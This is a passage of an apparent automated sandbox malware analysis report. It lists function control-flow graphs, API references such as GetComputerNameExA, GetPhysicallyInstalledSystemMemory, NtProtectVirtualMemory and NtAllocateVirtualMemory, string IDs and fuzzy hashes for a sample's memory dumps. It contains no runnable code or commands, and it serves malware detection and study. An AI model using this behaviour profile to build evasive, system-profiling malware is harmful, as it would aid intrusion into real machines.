                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710267603.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710780342.000000000043F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710849718.0000000000442000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710922934.0000000000453000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_6f9ea40b81.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CurrentProcess$ExitForegroundThreadWindow
                                                                                                                                                                                                                                                  • String ID: YO9W
                                                                                                                                                                                                                                                  • API String ID: 3118123366-386669604
                                                                                                                                                                                                                                                  • Opcode ID: 81875feee291dd51c94163340b3786e966dc5896524b3e4d2eaf5977dbc455ff
                                                                                                                                                                                                                                                  • Instruction ID: 5b12a659e8285d1355c3597aa5681aa9478bfa7506ef17589c1493984f4e9e7d
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 81875feee291dd51c94163340b3786e966dc5896524b3e4d2eaf5977dbc455ff
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 98315977F5061807C31C7AB98C4636AB5874BC4614F0F863E9DD9AB386FDB89C0442D9
                                                                                                                                                                                                                                                  Function 0042BFDA Relevance: 7.5, APIs: 3, Strings: 1, Instructions: 461COMMON
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 462 42bfda-42c03f call 43ce00 466 42c040-42c06c 462->466 466->466 467 42c06e-42c078 466->467 468 42c07a-42c083 467->468 469 42c09d 467->469 470 42c090-42c099 468->470 471 42c09f-42c0ac 469->471 470->470 472 42c09b 470->472 473 42c0cb-42c13a FreeLibrary call 43ce00 GetComputerNameExA 471->473 474 42c0ae-42c0b5 471->474 472->471 479 42c140-42c167 473->479 475 42c0c0-42c0c9 474->475 475->473 475->475 479->479 480 42c169-42c173 479->480 481 42c175-42c17f 480->481 482 42c18d 480->482 484 42c180-42c189 481->484 483 42c18f-42c19c 482->483 485 42c1bb-42c20f GetComputerNameExA 483->485 486 42c19e-42c1a5 483->486 484->484 487 42c18b 484->487 489 42c210-42c252 485->489 488 42c1b0-42c1b9 486->488 487->483 488->485 488->488 489->489 490 42c254-42c25e 489->490 491 42c260-42c267 490->491 492 42c27b-42c288 490->492 493 42c270-42c279 491->493 494 42c28a-42c291 492->494 495 42c2ab-42c2ff 492->495 493->492 493->493 496 42c2a0-42c2a9 494->496 498 42c300-42c324 495->498 496->495 496->496 498->498 499 42c326-42c330 498->499 500 42c332-42c339 499->500 501 42c34b-42c358 499->501 502 42c340-42c349 500->502 503 42c35a-42c361 501->503 504 42c37b-42c3d6 call 43ce00 501->504 502->501 502->502 505 42c370-42c379 503->505 509 42c3e0-42c3fa 504->509 505->504 505->505 509->509 510 42c3fc-42c406 509->510 511 42c41b-42c42f 510->511 512 42c408-42c40f 510->512 513 42c572-42c5b1 511->513 514 42c435-42c43c 511->514 515 42c410-42c419 512->515 517 42c5c0-42c5e7 513->517 516 42c440-42c44a 514->516 515->511 515->515 518 42c460-42c466 516->518 519 42c44c-42c451 516->519 517->517 520 42c5e9-42c5fb 517->520 522 42c490-42c49e 518->522 523 42c468-42c46b 518->523 521 42c510-42c516 519->521 524 42c61b-42c61e call 430520 520->524 525 42c5fd-42c604 520->525 531 42c518-42c51e 521->531 528 42c4a4-42c4a7 522->528 529 42c52a-42c533 522->529 523->522 526 42c46d-42c483 523->526 533 42c623-42c643 524->533 527 42c610-42c619 525->527 526->521 527->524 527->527 528->529 532 42c4ad-42c50e 528->532 535 42c535-42c537 529->535 536 42c539-42c53c 529->536 531->513 534 42c520-42c522 531->534 532->521 534->516 539 42c528 534->539 535->531 537 42c56e-42c570 536->537 538 42c53e-42c56c 536->538 537->521 538->521 539->513
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32(?), ref: 0042C0D7
                                                                                                                                                                                                                                                  • GetComputerNameExA.KERNELBASE(00000006,00000000,00000200), ref: 0042C113
                                                                                                                                                                                                                                                  • GetComputerNameExA.KERNELBASE(00000005,?,00000200), ref: 0042C1D8
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.3710377869.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710267603.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710780342.000000000043F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710849718.0000000000442000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710922934.0000000000453000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_6f9ea40b81.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ComputerName$FreeLibrary
                                                                                                                                                                                                                                                  • String ID: x
                                                                                                                                                                                                                                                  • API String ID: 2243422189-2363233923
                                                                                                                                                                                                                                                  • Opcode ID: 212c4427347d00bc0ab6c4fd254bb844e7ef8bf1701165750c227f18fd5959f2
                                                                                                                                                                                                                                                  • Instruction ID: f24e0535182122329204161442b6cb3576d9d8656e0dc52521a12abdc108ad65
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 212c4427347d00bc0ab6c4fd254bb844e7ef8bf1701165750c227f18fd5959f2
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EFD1B46060C3E08ED7358B2994903BFBBD1AFD7344F5849ADD0C99B282D779450ACB57
                                                                                                                                                                                                                                                  Function 0040C36E Relevance: 6.5, Strings: 5, Instructions: 203COMMON
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 600 40c36e-40c559 601 40c560-40c58e 600->601 601->601 602 40c590-40c7ab 601->602 604 40c7b0-40c7de 602->604 604->604 605 40c7e0-40c7e8 604->605 606 40c7ec-40c7ff 605->606
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.3710377869.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710267603.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710780342.000000000043F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710849718.0000000000442000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710922934.0000000000453000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_6f9ea40b81.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: ){+}$4cde$CJ$F'k)$GS
                                                                                                                                                                                                                                                  • API String ID: 0-4192230409
                                                                                                                                                                                                                                                  • Opcode ID: 5de04a91f599762488a7f1befa48500976ff1de46b0c1ed8ec4e4c363fac47c6
                                                                                                                                                                                                                                                  • Instruction ID: 6afdb2316fdadaf12e32bd698f1912d34734f08b0bc4a82971b76fff6b28e520
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5de04a91f599762488a7f1befa48500976ff1de46b0c1ed8ec4e4c363fac47c6
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 50B11BB84053058FE354DF629688FAA7BB0FB25310F1A82E9E0992F776D7748405CF96
                                                                                                                                                                                                                                                  Function 0042C6D7 Relevance: 5.9, APIs: 1, Strings: 2, Instructions: 614COMMON
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 607 42c6d7-42c6ff 608 42c700-42c74f 607->608 608->608 609 42c751-42c761 608->609 610 42c763-42c76f 609->610 611 42c77b-42c787 609->611 612 42c770-42c779 610->612 613 42c7a1-42c803 call 43ce00 call 41dc20 611->613 614 42c789-42c78b 611->614 612->611 612->612 622 42c810-42c82a 613->622 615 42c790-42c79d 614->615 615->615 618 42c79f 615->618 618->613 622->622 623 42c82c-42c85f 622->623 624 42c860-42c886 623->624 624->624 625 42c888-42c892 624->625 626 42c894-42c89b 625->626 627 42c8ab-42c8b3 625->627 628 42c8a0-42c8a9 626->628 629 42c8b5-42c8b6 627->629 630 42c8cb-42c8d8 627->630 628->627 628->628 631 42c8c0-42c8c9 629->631 632 42c8da-42c8e1 630->632 633 42c8fb-42c946 630->633 631->630 631->631 634 42c8f0-42c8f9 632->634 635 42c950-42c978 633->635 634->633 634->634 635->635 636 42c97a-42c984 635->636 637 42c986-42c98f 636->637 638 42c99b-42c9a5 636->638 639 42c990-42c999 637->639 640 42c9a7-42c9ab 638->640 641 42c9bb-42ca35 638->641 639->638 639->639 642 42c9b0-42c9b9 640->642 643 42cad8-42cb04 641->643 642->641 642->642 644 42cb10-42cb60 643->644 644->644 645 42cb62-42cb72 644->645 646 42cb74-42cb76 645->646 647 42cb8b-42cb97 645->647 648 42cb80-42cb89 646->648 649 42cbb1-42cbf7 call 43ce00 GetPhysicallyInstalledSystemMemory call 41dc20 647->649 650 42cb99-42cb9b 647->650 648->647 648->648 656 42cbfc-42cc13 649->656 651 42cba0-42cbad 650->651 651->651 653 42cbaf 651->653 653->649 657 42cc20-42cc3a 656->657 657->657 658 42cc3c-42cc6f 657->658 659 42cc70-42cc96 658->659 659->659 660 42cc98-42cca2 659->660 661 42cca4-42ccab 660->661 662 42ccbb-42ccc3 660->662 665 42ccb0-42ccb9 661->665 663 42ccc5-42ccc6 662->663 664 42ccdb-42cce8 662->664 666 42ccd0-42ccd9 663->666 667 42ccea-42ccf1 664->667 668 42cd0b-42cd56 664->668 665->662 665->665 666->664 666->666 669 42cd00-42cd09 667->669 670 42cd60-42cd88 668->670 669->668 669->669 670->670 671 42cd8a-42cd98 670->671 672 42cd9a-42cda1 671->672 673 42cdbb-42cdc5 671->673 674 42cdb0-42cdb9 672->674 675 42ca40-42cad5 673->675 676 42cdcb 673->676 674->673 674->674 675->643 677 42cdd0-42cdd9 676->677 677->677 678 42cddb 677->678 678->675
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.3710377869.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710267603.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710780342.000000000043F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710849718.0000000000442000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710922934.0000000000453000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_6f9ea40b81.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: '$iJ
                                                                                                                                                                                                                                                  • API String ID: 0-30662343
                                                                                                                                                                                                                                                  • Opcode ID: 5f8335f824c18f5e14225d200a316fb8f8740858805ddfb73ef0b7ad87012508
                                                                                                                                                                                                                                                  • Instruction ID: e8033de2897f6a471e39d6e72682695b514e130b01bc458e21cc2d5cc8d806b0
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5f8335f824c18f5e14225d200a316fb8f8740858805ddfb73ef0b7ad87012508
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7C02F57060C3E18FD7298F2990A03ABBFE1AF97304F58496ED4D997342D77984058B97
                                                                                                                                                                                                                                                  Function 0042BFD3 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 456COMMON
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 679 42bfd3-42c0e8 call 43ce00 682 42c0ed-42c13a GetComputerNameExA 679->682 683 42c140-42c167 682->683 683->683 684 42c169-42c173 683->684 685 42c175-42c17f 684->685 686 42c18d 684->686 688 42c180-42c189 685->688 687 42c18f-42c19c 686->687 689 42c1bb-42c20f GetComputerNameExA 687->689 690 42c19e-42c1a5 687->690 688->688 691 42c18b 688->691 693 42c210-42c252 689->693 692 42c1b0-42c1b9 690->692 691->687 692->689 692->692 693->693 694 42c254-42c25e 693->694 695 42c260-42c267 694->695 696 42c27b-42c288 694->696 697 42c270-42c279 695->697 698 42c28a-42c291 696->698 699 42c2ab-42c2ff 696->699 697->696 697->697 700 42c2a0-42c2a9 698->700 702 42c300-42c324 699->702 700->699 700->700 702->702 703 42c326-42c330 702->703 704 42c332-42c339 703->704 705 42c34b-42c358 703->705 706 42c340-42c349 704->706 707 42c35a-42c361 705->707 708 42c37b-42c3d6 call 43ce00 705->708 706->705 706->706 709 42c370-42c379 707->709 713 42c3e0-42c3fa 708->713 709->708 709->709 713->713 714 42c3fc-42c406 713->714 715 42c41b-42c42f 714->715 716 42c408-42c40f 714->716 717 42c572-42c5b1 715->717 718 42c435-42c43c 715->718 719 42c410-42c419 716->719 721 42c5c0-42c5e7 717->721 720 42c440-42c44a 718->720 719->715 719->719 722 42c460-42c466 720->722 723 42c44c-42c451 720->723 721->721 724 42c5e9-42c5fb 721->724 726 42c490-42c49e 722->726 727 42c468-42c46b 722->727 725 42c510-42c516 723->725 728 42c61b-42c61e call 430520 724->728 729 42c5fd-42c604 724->729 735 42c518-42c51e 725->735 732 42c4a4-42c4a7 726->732 733 42c52a-42c533 726->733 727->726 730 42c46d-42c483 727->730 737 42c623-42c643 728->737 731 42c610-42c619 729->731 730->725 731->728 731->731 732->733 736 42c4ad-42c50e 732->736 739 42c535-42c537 733->739 740 42c539-42c53c 733->740 735->717 738 42c520-42c522 735->738 736->725 738->720 743 42c528 738->743 739->735 741 42c56e-42c570 740->741 742 42c53e-42c56c 740->742 741->725 742->725 743->717
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetComputerNameExA.KERNELBASE(00000006,00000000,00000200), ref: 0042C113
                                                                                                                                                                                                                                                  • GetComputerNameExA.KERNELBASE(00000005,?,00000200), ref: 0042C1D8
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.3710377869.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710267603.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710780342.000000000043F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710849718.0000000000442000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710922934.0000000000453000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_6f9ea40b81.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ComputerName
                                                                                                                                                                                                                                                  • String ID: x
                                                                                                                                                                                                                                                  • API String ID: 3545744682-2363233923
                                                                                                                                                                                                                                                  • Opcode ID: dd7dd52a73c17c107c662ee8ca0c022aa0f15367076f24ecb02be622242e9914
                                                                                                                                                                                                                                                  • Instruction ID: cbfe56490d4610b99627c39bd120223bdbde8b4c29662e55905f397c0fd00549
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: dd7dd52a73c17c107c662ee8ca0c022aa0f15367076f24ecb02be622242e9914
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1AD1176060C7E18ED7358B2894903BFBBD1AF97344F5849AED0D54B382D739940AC797
                                                                                                                                                                                                                                                  Function 007FF09C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 104nativeCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 788 7ff09c-7ff0f7 call 7fe9ac call 7fe6cc NtProtectVirtualMemory 793 7ff105-7ff112 788->793 794 7ff1e8-7ff1eb 793->794 795 7ff118-7ff15d 793->795 796 7ff15f-7ff168 795->796 797 7ff182-7ff18a 795->797 798 7ff16a-7ff171 796->798 799 7ff173 796->799 800 7ff18c-7ff193 797->800 801 7ff195 797->801 802 7ff17a-7ff180 798->802 799->802 803 7ff19c-7ff19f 800->803 801->803 804 7ff1a2-7ff1ab 802->804 803->804 805 7ff1ad-7ff1b5 804->805 806 7ff1b8-7ff1e3 call 7fe9ac call 7fe6cc NtProtectVirtualMemory 804->806 805->806 811 7ff0f9-7ff101 806->811 811->793
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • NtProtectVirtualMemory.NTDLL(000000FF,00000000,?,00000002,00000000,00000000,00000000,082962C8,?,?,007FE3BD,?,00000000,?), ref: 007FF0DD
                                                                                                                                                                                                                                                  • NtProtectVirtualMemory.NTDLL(000000FF,?,007FE3BD,00000000,00000000,00000000,00000000,082962C8,?,?,007FE3BD,?,00000000,?), ref: 007FF1DF
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.3711311245.00000000007FE000.00000040.00000010.00020000.00000000.sdmp, Offset: 007FE000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7fe000_6f9ea40b81.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: MemoryProtectVirtual
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2706961497-3916222277
                                                                                                                                                                                                                                                  • Opcode ID: 7c3c623b9836fa83dbdc5394a12b48ed3865b76677a6f9c3d53535781c8631a1
                                                                                                                                                                                                                                                  • Instruction ID: 9c857d59760020427b25af1ffb3ae8f3079b379881acecbeb7d627a8acbb3c06
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7c3c623b9836fa83dbdc5394a12b48ed3865b76677a6f9c3d53535781c8631a1
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0B4116B1D0020DEBDB04CF84C985AFEBBB5FF58310F20815AE915AB391D7789A41CBA5
                                                                                                                                                                                                                                                  Function 00426170 Relevance: 5.3, Strings: 4, Instructions: 318COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.3710377869.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710267603.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710780342.000000000043F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710849718.0000000000442000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710922934.0000000000453000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_6f9ea40b81.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                                  • String ID: 4zVc$8zVc$YNMZ$cba`
                                                                                                                                                                                                                                                  • API String ID: 2994545307-1799417857
                                                                                                                                                                                                                                                  • Opcode ID: eaf66d541d549ce35d0b7173bc81318c446716c3833972a3082171e3945cfb6b
                                                                                                                                                                                                                                                  • Instruction ID: a4538a0261ff6c2ac210d57fc6ac5424e6a326b8b8d8802f404cc31a7d59ec03
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: eaf66d541d549ce35d0b7173bc81318c446716c3833972a3082171e3945cfb6b
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 189147B2F042208BD724DA25EC8172B7292EBD1314F5A857EEC8597342E678AC00C7DA
                                                                                                                                                                                                                                                  Function 00416B7E Relevance: 1.8, APIs: 1, Instructions: 335COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.3710377869.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710267603.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710780342.000000000043F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710849718.0000000000442000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710922934.0000000000453000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_6f9ea40b81.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 890e8e76508b01334db47f64388eac8d659fe5be4548ddbfe270fdd3745dd69d
                                                                                                                                                                                                                                                  • Instruction ID: 4d3fd89be0cb7aed4be93335616a378edd6ad360b4f2b7dd84c825cf95623c92
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 890e8e76508b01334db47f64388eac8d659fe5be4548ddbfe270fdd3745dd69d
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9BA159B16047418FCB24CF34C891663BBE2FF56314B098A6ED49A8B792E738F845CB55
                                                                                                                                                                                                                                                  Function 007FEB5C Relevance: 1.7, APIs: 1, Instructions: 162memorynativeCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • NtAllocateVirtualMemory.NTDLL(000000FF,00000000,00000000,?,00003000,00000004,00000000,00000000,6793C34C), ref: 007FEBDE
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.3711311245.00000000007FE000.00000040.00000010.00020000.00000000.sdmp, Offset: 007FE000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7fe000_6f9ea40b81.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: AllocateMemoryVirtual
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2167126740-0
                                                                                                                                                                                                                                                  • Opcode ID: 0bfa60c63f50ef171a0b56c2a5d9744cc2ad877c89f3882ce56d9e2bbd017102
                                                                                                                                                                                                                                                  • Instruction ID: ab42f7be552f53f595c7a17e4d830efebdcd177dcba24b92603cfdf0268d1a15
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0bfa60c63f50ef171a0b56c2a5d9744cc2ad877c89f3882ce56d9e2bbd017102
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E2613A74E0020DEFDB04DF94C885BBEBBB5EF58714F108559EA10AB3A1D7789A81CB61
                                                                                                                                                                                                                                                  Function 0043E690 Relevance: 1.6, Strings: 1, Instructions: 384COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.3710377869.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710267603.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710780342.000000000043F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710849718.0000000000442000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710922934.0000000000453000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_6f9ea40b81.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                                  • String ID: @CDE
                                                                                                                                                                                                                                                  • API String ID: 2994545307-1513065382
                                                                                                                                                                                                                                                  • Opcode ID: cbdfbb28d977ac1ea6b7f73f0ada9322f454d3da5a8c62154e5dc83033fd8ee1
                                                                                                                                                                                                                                                  • Instruction ID: 3c5ac0be7424b57116813a4f2293c38aabf5a2246835f37d4781b8179357b19c
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cbdfbb28d977ac1ea6b7f73f0ada9322f454d3da5a8c62154e5dc83033fd8ee1
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EFB146717493414BC318DB2AC8D1A3BBBE6ABE9314F1CD93DE58687392C638DC058796
                                                                                                                                                                                                                                                  Function 0043B480 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • LdrInitializeThunk.NTDLL(0043D4FB,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043B4AE
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.3710377869.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710267603.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710780342.000000000043F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710849718.0000000000442000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710922934.0000000000453000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_6f9ea40b81.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                                                                                  • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                                                                                                                                                                  • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
                                                                                                                                                                                                                                                  Function 00417E82 Relevance: 1.5, Strings: 1, Instructions: 236COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
